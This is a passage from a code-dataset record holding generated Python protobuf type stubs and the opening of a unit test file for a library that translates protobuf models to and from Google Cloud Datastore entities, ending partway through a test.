Iterable as typing___Iterable,\n List as typing___List,\n Mapping as typing___Mapping,\n MutableMapping as typing___MutableMapping,\n Optional as typing___Optional,\n Text as typing___Text,\n Tuple as typing___Tuple,\n cast as typing___cast,\n)\n\nfrom typing_extensions import (\n Literal as typing_extensions___Literal,\n)\n\n\nclass ExampleCompatEnumModel(int):\n DESCRIPTOR: google___protobuf___descriptor___EnumDescriptor = ...\n @classmethod\n def Name(cls, number: int) -> str: ...\n @classmethod\n def Value(cls, name: str) -> ExampleCompatEnumModel: ...\n @classmethod\n def keys(cls) -> typing___List[str]: ...\n @classmethod\n def values(cls) -> typing___List[ExampleCompatEnumModel]: ...\n @classmethod\n def items(cls) -> typing___List[typing___Tuple[str, ExampleCompatEnumModel]]: ...\n ENUM10 = typing___cast(ExampleCompatEnumModel, 0)\n ENUM11 = typing___cast(ExampleCompatEnumModel, 1)\n ENUM12 = typing___cast(ExampleCompatEnumModel, 2)\nENUM10 = typing___cast(ExampleCompatEnumModel, 0)\nENUM11 = typing___cast(ExampleCompatEnumModel, 1)\nENUM12 = typing___cast(ExampleCompatEnumModel, 2)\n\nclass ExampleCompatNestedModel(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n string_key = ... # type: typing___Text\n int32_key = ... # type: int\n enum_key = ... # type: ExampleCompatEnumModel\n\n def __init__(self,\n *,\n string_key : typing___Optional[typing___Text] = None,\n int32_key : typing___Optional[int] = None,\n enum_key : typing___Optional[ExampleCompatEnumModel] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleCompatNestedModel: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"enum_key\",u\"int32_key\",u\"string_key\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"enum_key\",b\"enum_key\",u\"int32_key\",b\"int32_key\",u\"string_key\",b\"string_key\"]) -> None: ...\n\nclass ExampleCompatDBModel(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n class MapStringStringEntry(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n key = ... # type: typing___Text\n value = ... # type: typing___Text\n\n def __init__(self,\n *,\n key : typing___Optional[typing___Text] = None,\n value : typing___Optional[typing___Text] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleCompatDBModel.MapStringStringEntry: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",u\"value\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",b\"key\",u\"value\",b\"value\"]) -> None: ...\n\n class MapStringInt32Entry(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n key = ... # type: typing___Text\n value = ... # type: int\n\n def __init__(self,\n *,\n key : typing___Optional[typing___Text] = None,\n value : typing___Optional[int] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleCompatDBModel.MapStringInt32Entry: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",u\"value\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",b\"key\",u\"value\",b\"value\"]) -> None: ...\n\n int32_key = ... # type: int\n string_key = ... # type: typing___Text\n bool_key = ... # type: bool\n bytes_key = ... # type: bytes\n double_key = ... # type: float\n int64_key = ... # type: int\n string_array_key = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[typing___Text]\n int32_array_key = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[int]\n enum_key = ... # type: ExampleCompatEnumModel\n\n @property\n def map_string_string(self) -> typing___MutableMapping[typing___Text, typing___Text]: ...\n\n @property\n def map_string_int32(self) -> typing___MutableMapping[typing___Text, int]: ...\n\n @property\n def timestamp_key(self) -> google___protobuf___timestamp_pb2___Timestamp: ...\n\n @property\n def struct_key(self) -> google___protobuf___struct_pb2___Struct: ...\n\n def __init__(self,\n *,\n int32_key : typing___Optional[int] = None,\n string_key : typing___Optional[typing___Text] = None,\n bool_key : typing___Optional[bool] = None,\n bytes_key : typing___Optional[bytes] = None,\n double_key : typing___Optional[float] = None,\n int64_key : typing___Optional[int] = None,\n map_string_string : typing___Optional[typing___Mapping[typing___Text, typing___Text]] = None,\n map_string_int32 : typing___Optional[typing___Mapping[typing___Text, int]] = None,\n string_array_key : typing___Optional[typing___Iterable[typing___Text]] = None,\n int32_array_key : typing___Optional[typing___Iterable[int]] = None,\n enum_key : typing___Optional[ExampleCompatEnumModel] = None,\n timestamp_key : typing___Optional[google___protobuf___timestamp_pb2___Timestamp] = None,\n struct_key : typing___Optional[google___protobuf___struct_pb2___Struct] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleCompatDBModel: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def HasField(self, field_name: typing_extensions___Literal[u\"struct_key\",u\"timestamp_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"bool_key\",u\"bytes_key\",u\"double_key\",u\"enum_key\",u\"int32_array_key\",u\"int32_key\",u\"int64_key\",u\"map_string_int32\",u\"map_string_string\",u\"string_array_key\",u\"string_key\",u\"struct_key\",u\"timestamp_key\"]) -> None: ...\n else:\n def HasField(self, field_name: typing_extensions___Literal[u\"struct_key\",b\"struct_key\",u\"timestamp_key\",b\"timestamp_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"bool_key\",b\"bool_key\",u\"bytes_key\",b\"bytes_key\",u\"double_key\",b\"double_key\",u\"enum_key\",b\"enum_key\",u\"int32_array_key\",b\"int32_array_key\",u\"int32_key\",b\"int32_key\",u\"int64_key\",b\"int64_key\",u\"map_string_int32\",b\"map_string_int32\",u\"map_string_string\",b\"map_string_string\",u\"string_array_key\",b\"string_array_key\",u\"string_key\",b\"string_key\",u\"struct_key\",b\"struct_key\",u\"timestamp_key\",b\"timestamp_key\"]) -> None: ...\n" }, { "alpha_fraction": 0.6330932378768921, "alphanum_fraction": 0.6532334685325623, "avg_line_length": 50.20195007324219, "blob_id": "2fdb63fdd3afee7d82f00b023ca6f77e309570b4", "content_id": "754c157b6bedad0510b3025d5c53fcd10469c873", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52485, "license_type": "permissive", "max_line_length": 100, "num_lines": 1025, "path": "/tests/unit/test_translator.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# pylint: disable=all\n\nimport sys\nimport copy\nimport unittest\n\nimport requests\nfrom google.cloud import datastore\nfrom google.cloud.datastore_v1.proto import entity_pb2\nfrom google.protobuf import struct_pb2\nfrom google.type import latlng_pb2\n\nfrom tests.generated import example_pb2\nfrom tests.generated import example2_pb2\nfrom tests.generated.models import example3_pb2\n\nfrom tests.mocks import EmulatorCreds\nfrom tests.mocks import EXAMPLE_DICT_POPULATED\nfrom tests.mocks import EXAMPLE_DICT_DEFAULT_VALUES\nfrom tests.mocks import EXAMPLE_PB_POPULATED\nfrom tests.mocks import EXAMPLE_PB_DEFAULT_VALUES\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\nfrom protobuf_cloud_datastore_translator import model_pb_with_key_to_entity_pb\nfrom protobuf_cloud_datastore_translator import entity_pb_to_model_pb\n\n__all__ = [\n 'ModelPbToEntityPbTranslatorTestCase'\n]\n\n\nclass ModelPbToEntityPbTranslatorTestCase(unittest.TestCase):\n maxDiff = None\n\n def setUp(self):\n super(ModelPbToEntityPbTranslatorTestCase, self).setUp()\n\n modules_to_remove = [\n 'tests.generated.options_pb2',\n 'tests.generated.models.options_pb2',\n 'tests.generated.example_with_options_pb2',\n 'tests.generated.models.example_with_options_pb2',\n ]\n\n for module_name in modules_to_remove:\n if module_name in sys.modules:\n del sys.modules[module_name]\n\n def test_translate_fully_populated_model_roundtrip(self):\n # type: () -> None\n # Create an instance of ExampleDBModel Protobuf message\n example_pb = EXAMPLE_PB_POPULATED\n\n # Create example Entity protobuf object via google-cloud-datastore library with the\n # matching values\n # NOTE: We cast any number inside the dictionary to double to work around the bug in\n # \"entity_to_protobuf\" not handling numbers inside structs correctly\n example_data = copy.deepcopy(EXAMPLE_DICT_POPULATED)\n\n example_data['struct_array_key'] = self._int_to_double(example_data['struct_array_key'])\n example_data['struct_key'] = self._int_to_double(example_data['struct_key'])\n\n entity = datastore.Entity()\n entity.update(example_data)\n\n # Verify that the both Protobuf objects are the same (translated one and the datastore\n # native one)\n entity_pb_native = datastore.helpers.entity_to_protobuf(entity)\n entity_roundtrip = datastore.helpers.entity_from_protobuf(entity_pb_native)\n\n # Assert that end result after round trip is the same\n self.assertEqual(entity, entity_roundtrip)\n\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_pb)\n\n self.assertEqual(repr(entity_pb_native), repr(entity_pb_translated))\n self.assertEqual(entity_pb_native, entity_pb_translated)\n self.assertEqual(sorted(entity_pb_native.SerializePartialToString()),\n sorted(entity_pb_translated.SerializePartialToString()))\n\n # Try converting it back to the original entity and verify it matches the input\n example_pb_converted = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb_native)\n self.assertEqual(example_pb_converted, example_pb)\n self.assertEqual(sorted(example_pb_converted.SerializePartialToString()),\n sorted(example_pb.SerializePartialToString()))\n\n def test_struct_field_type_number_values(self):\n # NOTE: Keep in mind that struct only supports double number types and not integers\n example_pb = EXAMPLE_PB_POPULATED\n\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_pb)\n\n # Verify that all the number values either top level, or nested or inside a list are\n # correctly serialized to a double value\n # Top level attribute\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key2'].double_value, 2.0)\n\n # Array attribute\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key3'].array_value.values[0].double_value,\n 1.0)\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key3'].array_value.values[1].double_value,\n 2.0)\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key3'].array_value.values[2].double_value,\n 3.0)\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key3'].array_value.values[3].double_value,\n 4.44)\n\n # Nested struct attribute\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key5'].entity_value.properties['dict_key_2'].double_value,\n 30.0)\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key5'].entity_value.properties['dict_key_3'].array_value\n .values[3].double_value,\n 7.0)\n\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key5'].entity_value.properties['dict_key_3'].array_value\n .values[4].entity_value.properties['g'].array_value.values[0].double_value,\n 1.0)\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key5'].entity_value.properties['dict_key_3'].array_value\n .values[4].entity_value.properties['g'].array_value.values[1].double_value,\n 2.0)\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key5'].entity_value.properties['dict_key_3'].array_value\n .values[4].entity_value.properties['g'].array_value.values[2].double_value,\n 33.33)\n\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key5'].entity_value.properties['dict_key_5'].double_value,\n 55.55)\n\n # Top level attribute\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key11'].double_value, 11.123)\n\n # Test the round trip conversion\n example_pb_converted = entity_pb_to_model_pb(example_pb2.ExampleDBModel,\n entity_pb_translated)\n\n self.assertEqual(example_pb_converted.struct_key['key2'], 2.0)\n self.assertEqual(example_pb_converted.struct_key['key3'][0], 1)\n self.assertEqual(example_pb_converted.struct_key['key3'][1], 2)\n self.assertEqual(example_pb_converted.struct_key['key3'][2], 3)\n self.assertEqual(example_pb_converted.struct_key['key3'][3], 4.44)\n self.assertEqual(example_pb_converted.struct_key['key5']['dict_key_2'], 30)\n self.assertEqual(example_pb_converted.struct_key['key5']['dict_key_3'][3], 7)\n self.assertEqual(example_pb_converted.struct_key['key5']['dict_key_3'][4]['g'][0], 1)\n self.assertEqual(example_pb_converted.struct_key['key5']['dict_key_3'][4]['g'][1], 2)\n self.assertEqual(example_pb_converted.struct_key['key5']['dict_key_3'][4]['g'][2], 33.33)\n self.assertEqual(example_pb_converted.struct_key['key5']['dict_key_5'], 55.55)\n self.assertEqual(example_pb_converted.struct_key['key11'], 11.123)\n\n def test_translate_values_not_set_default_values_used(self):\n # type: () -> None\n # NOTE: proto3 syntax doesn't support HasField() anymore so there is now way for us to\n # determine if a value is set / provided. We just use the default values.\n # See https://github.com/googleapis/google-cloud-python/issues/1402\n # Verify that the default values are correctly serialized when explicitly provided and\n # when not set\n entity = datastore.Entity()\n entity.update()\n\n entity_pb_native = datastore.helpers.entity_to_protobuf(entity)\n entity_roundtrip = datastore.helpers.entity_from_protobuf(entity_pb_native)\n\n # Assert that end result after round trip is the same\n self.assertEqual(entity, entity_roundtrip)\n\n # Create new instance which explicitly provides values for all the fields which are the\n # same as the default values\n example_pb = EXAMPLE_PB_DEFAULT_VALUES\n\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_pb)\n\n entity = datastore.Entity()\n entity.update(EXAMPLE_DICT_DEFAULT_VALUES)\n\n entity_pb_native = datastore.helpers.entity_to_protobuf(entity)\n\n self.assertEqual(repr(entity_pb_native), repr(entity_pb_translated))\n self.assertEqual(entity_pb_native, entity_pb_translated)\n self.assertEqual(sorted(entity_pb_native.SerializePartialToString()),\n sorted(entity_pb_translated.SerializePartialToString()))\n\n # Serializing object with all values set to default values should result in the same\n # end result as serializing an empty object where implicit default values are used\n example_pb_empty = example_pb2.ExampleDBModel()\n entity_pb_empty_translated = model_pb_to_entity_pb(model_pb=example_pb_empty)\n\n self.assertEqual(entity_pb_empty_translated, entity_pb_translated)\n self.assertEqual(entity_pb_empty_translated, entity_pb_native)\n\n # Test a scenario using exclude_falsy_values=True. All the default falsy values\n # should be excluded.\n example_pb_empty = example_pb2.ExampleDBModel()\n entity_pb_empty_translated = model_pb_to_entity_pb(model_pb=example_pb_empty,\n exclude_falsy_values=True)\n\n entity = datastore.Entity()\n entity_pb_native = datastore.helpers.entity_to_protobuf(entity)\n\n self.assertEqual(entity_pb_empty_translated, entity_pb_native)\n\n def test_translate_model_partially_populated(self):\n # type: () -> None\n # Test scenario where only a single field on the model is populated\n example_pb = example_pb2.ExampleDBModel()\n example_pb.int32_key = 555\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEqual(entity_pb_serialized.properties['int32_key'].integer_value, 555)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'int32_key')\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.string_key = 'some string value'\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'string_key')\n self.assertEqual(entity_pb_serialized.properties['string_key'].string_value,\n 'some string value')\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.bool_key = True\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'bool_key')\n self.assertEqual(entity_pb_serialized.properties['bool_key'].boolean_value, True)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.bytes_key = b'abcdefg'\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'bytes_key')\n self.assertEqual(entity_pb_serialized.properties['bytes_key'].blob_value, b'abcdefg')\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.double_key = 123.456\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'double_key')\n self.assertEqual(entity_pb_serialized.properties['double_key'].double_value,\n 123.456)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.float_key = 456.78900146484375\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'float_key')\n self.assertEqual(entity_pb_serialized.properties['float_key'].double_value,\n 456.78900146484375)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.int64_key = 1000000000\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'int64_key')\n self.assertEqual(entity_pb_serialized.properties['int64_key'].integer_value, 1000000000)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.enum_key = 2 # type: ignore\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'enum_key')\n self.assertEqual(entity_pb_serialized.properties['enum_key'].integer_value, 2)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.string_array_key.append('value1')\n example_pb.string_array_key.append('value2')\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'string_array_key')\n self.assertEqual(\n len(entity_pb_serialized.properties['string_array_key'].array_value.values),\n 2)\n self.assertEqual(\n entity_pb_serialized.properties['string_array_key'].array_value.values[0]\n .string_value,\n 'value1')\n self.assertEqual(\n entity_pb_serialized.properties['string_array_key'].array_value.values[1]\n .string_value,\n 'value2')\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.int32_array_key.append(1111)\n example_pb.int32_array_key.append(2222)\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'int32_array_key')\n self.assertEqual(len(entity_pb_serialized.properties['int32_array_key'].array_value.values),\n 2)\n self.assertEqual(\n entity_pb_serialized.properties['int32_array_key'].array_value.values[0].integer_value,\n 1111)\n self.assertEqual(\n entity_pb_serialized.properties['int32_array_key'].array_value.values[1].integer_value,\n 2222)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.map_string_string['key1'] = 'value1'\n example_pb.map_string_string['key2'] = 'value2'\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized,\n 'map_string_string')\n self.assertEqual(\n entity_pb_serialized.properties['map_string_string'].entity_value\n .properties['key1'].string_value,\n 'value1')\n self.assertEqual(entity_pb_serialized.properties['map_string_string'].entity_value\n .properties['key2'].string_value,\n 'value2')\n\n geo_point_value = latlng_pb2.LatLng(latitude=-20.2, longitude=+160.5)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.geo_point_key.CopyFrom(geo_point_value)\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized,\n 'geo_point_key')\n self.assertEqual(entity_pb_serialized.properties['geo_point_key'].geo_point_value.latitude,\n -20.2)\n self.assertEqual(entity_pb_serialized.properties['geo_point_key'].geo_point_value.longitude,\n +160.5)\n\n def test_model_pb_with_key_to_entity_pb(self):\n # type: () -> None\n client = datastore.Client(credentials=EmulatorCreds(), _http=requests.Session(),\n namespace='namespace1', project='project1')\n\n example_pb = example_pb2.ExampleDBModelWithKey()\n example_pb.key = 'primary_key_one'\n example_pb.string_key = 'value'\n example_pb.int32_key = 100\n\n entity_pb_translated = model_pb_with_key_to_entity_pb(client=client, model_pb=example_pb)\n\n self.assertEqual(entity_pb_translated.key.partition_id.namespace_id, 'namespace1')\n self.assertEqual(entity_pb_translated.key.partition_id.project_id, 'project1')\n self.assertEqual(entity_pb_translated.key.path[0].kind, 'ExampleDBModelWithKey')\n self.assertEqual(entity_pb_translated.key.path[0].name, 'primary_key_one')\n self.assertEqual(entity_pb_translated.properties['string_key'].string_value, 'value')\n self.assertEqual(entity_pb_translated.properties['int32_key'].integer_value, 100)\n\n def test_model_pb_to_entity_pb_invalid_argument_type(self):\n # type: () -> None\n class Invalid(object):\n pass\n\n example_pb = Invalid()\n\n expected_msg = 'model_pb argument is not a valid Protobuf class instance'\n self.assertRaisesRegexp(ValueError, expected_msg, model_pb_to_entity_pb,\n example_pb) # type: ignore\n\n def test_model_pb_with_key_to_entity_pb_invalid_argument_type(self):\n # type: () -> None\n class Invalid(object):\n pass\n\n client = datastore.Client(credentials=EmulatorCreds(), _http=requests.Session(),\n namespace='namespace1', project='project1')\n example_pb = Invalid()\n\n expected_msg = 'model_pb argument is not a valid Protobuf class instance'\n self.assertRaisesRegexp(ValueError, expected_msg, model_pb_with_key_to_entity_pb, client,\n example_pb)\n\n def test_entity_pb_to_model_pb_strict_mode(self):\n # type: () -> None\n\n entity_pb = entity_pb2.Entity()\n entity_native = datastore.Entity()\n entity_native.update({'string_key': 'test value', 'int32_key': 20, 'non_valid_key': 'bar'})\n entity_pb = datastore.helpers.entity_to_protobuf(entity_native)\n\n # 1. Not using strict mode. Field which is available on the Entity object, but not model\n # object should be ignored\n example_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb)\n\n self.assertEqual(example_pb.string_key, 'test value')\n self.assertEqual(example_pb.int32_key, 20)\n self.assertEqual(example_pb.int32_key, 20)\n self.assertRaises(AttributeError, getattr, example_pb, 'non_valid_key')\n\n example_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb,\n strict=False)\n\n self.assertEqual(example_pb.string_key, 'test value')\n self.assertEqual(example_pb.int32_key, 20)\n self.assertRaises(AttributeError, getattr, example_pb, 'non_valid_key')\n\n # 2. Using strict mode, exception should be thrown\n expected_msg = ('Database object contains field \"non_valid_key\" which is not defined on '\n 'the database model class \"ExampleDBModel\"')\n self.assertRaisesRegexp(ValueError, expected_msg, entity_pb_to_model_pb,\n example_pb2.ExampleDBModel, entity_pb, strict=True)\n\n def test_entity_pb_to_model_pb_null_type(self):\n entity_pb = entity_pb2.Entity()\n null_value = entity_pb.properties.get_or_create('null_key')\n null_value.null_value = 0\n\n model_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb)\n self.assertEqual(model_pb.null_key, 0)\n\n entity_pb = entity_pb2.Entity()\n null_value = entity_pb.properties.get_or_create('null_key')\n null_value.null_value = 1\n\n model_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb)\n self.assertEqual(model_pb.null_key, 0)\n\n def test_entity_pb_to_model_pb_geopoint_type(self):\n entity_pb = entity_pb2.Entity()\n\n latlng_value = latlng_pb2.LatLng(latitude=-20.2, longitude=+160.5)\n\n geo_point_value = entity_pb.properties.get_or_create('geo_point_key')\n geo_point_value.geo_point_value.CopyFrom(latlng_value)\n\n model_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb)\n self.assertEqual(model_pb.geo_point_key.latitude, -20.2)\n self.assertEqual(model_pb.geo_point_key.longitude, +160.5)\n\n latlng_value = latlng_pb2.LatLng(latitude=0.0, longitude=0.0)\n\n geo_point_value = entity_pb.properties.get_or_create('geo_point_key')\n geo_point_value.geo_point_value.CopyFrom(latlng_value)\n\n model_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb)\n self.assertEqual(model_pb.geo_point_key.latitude, 0.0)\n self.assertEqual(model_pb.geo_point_key.longitude, 0.0)\n\n def test_model_pb_to_entity_pb_referenced_type(self):\n # Test a scenario where model pb references a type from another protobuf file\n example_referenced_type_pb = example2_pb2.ExampleReferencedType()\n example_referenced_type_pb.key_1 = 'value 1'\n example_referenced_type_pb.key_2 = 'value 2'\n\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_referenced_type_pb)\n self.assertEqual(entity_pb_translated.properties['key_1'].string_value, 'value 1')\n self.assertEqual(entity_pb_translated.properties['key_2'].string_value, 'value 2')\n\n example_with_package_referenced_type_pb = example3_pb2.ExampleWithPackageDBModel()\n example_with_package_referenced_type_pb.string_key = 'value 4'\n\n entity_pb_translated = model_pb_to_entity_pb(\n model_pb=example_with_package_referenced_type_pb)\n self.assertEqual(entity_pb_translated.properties['string_key'].string_value, 'value 4')\n\n example_with_referenced_type_pb = example_pb2.ExampleWithReferencedTypeDBModel()\n example_with_referenced_type_pb.string_key = 'value 3'\n example_with_referenced_type_pb.referenced_enum = example2_pb2.ExampleReferencedEnum.KEY1\n example_with_referenced_type_pb.referenced_type_key.CopyFrom(example_referenced_type_pb)\n example_with_referenced_type_pb.referenced_package_type_key.CopyFrom(\n example_with_package_referenced_type_pb)\n\n example_with_nested_struct_db_model_pb = example_pb2.ExampleWithNestedStructDBModel()\n example_with_nested_struct_db_model_pb.struct_key.update({'foo': 'bar', 'bar': 'baz',\n 'bool1': True, 'bool2': False,\n 'number1': 100, 'number2': 22.33})\n\n example_with_referenced_type_pb.referenced_struct_key.CopyFrom(\n example_with_nested_struct_db_model_pb)\n\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_with_referenced_type_pb)\n self.assertEqual(entity_pb_translated.properties['string_key'].string_value, 'value 3')\n self.assertEqual(entity_pb_translated.properties['referenced_enum'].integer_value, 1)\n self.assertEqual(entity_pb_translated.properties['referenced_type_key'].entity_value.\n properties['key_1'].string_value,\n 'value 1')\n self.assertEqual(entity_pb_translated.properties['referenced_type_key'].entity_value.\n properties['key_2'].string_value,\n 'value 2')\n self.assertEqual(entity_pb_translated.properties['referenced_package_type_key'].\n entity_value.properties['string_key'].string_value,\n 'value 4')\n self.assertEqual(entity_pb_translated.properties['referenced_struct_key'].entity_value\n .properties['struct_key'].entity_value.properties['foo'].string_value,\n 'bar')\n self.assertEqual(entity_pb_translated.properties['referenced_struct_key'].entity_value\n .properties['struct_key'].entity_value.properties['bar'].string_value,\n 'baz')\n self.assertEqual(entity_pb_translated.properties['referenced_struct_key'].entity_value\n .properties['struct_key'].entity_value.properties['bool1'].boolean_value,\n True)\n self.assertEqual(entity_pb_translated.properties['referenced_struct_key'].entity_value\n .properties['struct_key'].entity_value.properties['bool2'].boolean_value,\n False)\n\n # Perform the round trip, translate it back to the model and verity it matches the original\n # input\n model_pb_round_trip = entity_pb_to_model_pb(example_pb2.ExampleWithReferencedTypeDBModel,\n entity_pb_translated)\n self.assertEqual(model_pb_round_trip, example_with_referenced_type_pb)\n\n def test_model_pb_to_entity_pb_nested_struct_roundtrip(self):\n # type: () -> None\n example_data = {\n 'key1': u'val1',\n 'key2': 2,\n 'key3': [1, 2, 3],\n 'key4': u'čđć',\n 'key5': {\n 'dict_key_1': u'1',\n 'dict_key_2': 30,\n 'dict_key_3': [u'a', u'b', u'c', 3,\n {u'f': u'h', u'm': [20, 30, 40], u'g': {u'foo': u'bar'}}],\n 'dict_key_4': {u'1': 1.1, u'2': 2.2, u'3': 3.33}\n\n }\n }\n\n example_pb = example_pb2.ExampleWithNestedStructDBModel()\n example_pb.struct_key.update(example_data)\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_pb)\n\n # Verify that the both Protobuf objects are the same (translated one and the datastore\n # native one)\n\n # NOTE: We cast any number inside the dictionary to double to work around the bug in\n # \"entity_to_protobuf\" not handling numbers inside structs correctly\n example_data = self._int_to_double(example_data)\n entity = datastore.Entity()\n entity.update({'struct_key': example_data})\n\n entity_pb_native = datastore.helpers.entity_to_protobuf(entity)\n\n self.assertEqual(repr(entity_pb_native), repr(entity_pb_translated))\n self.assertEqual(entity_pb_translated, entity_pb_native)\n self.assertEqual(sorted(entity_pb_native.SerializePartialToString()),\n sorted(entity_pb_translated.SerializePartialToString()))\n\n # Try converting it back to the original Protobuf object and verify it matches the input\n example_pb_converted = entity_pb_to_model_pb(example_pb2.ExampleWithNestedStructDBModel,\n entity_pb_translated)\n self.assertEqual(example_pb_converted, example_pb)\n self.assertEqual(sorted(example_pb_converted.SerializePartialToString()),\n sorted(example_pb.SerializePartialToString()))\n\n def test_model_pb_to_entity_pb_repeated_referenced_field_with_enum_field(self):\n # type: () -> None\n # Test a scenario where a repeated field references a nested type which contains an ENUM\n # and ensure that default enum value (0) is correctly set either when it's explicitly\n # provided or when it's not provided and a default value is used.\n example_pb = example_pb2.ExampleDBModel()\n\n example_placeholder_pb1 = example_pb2.ExampleNestedModel(string_key=u'value 1',\n int32_key=12345)\n example_placeholder_pb1.enum_key = 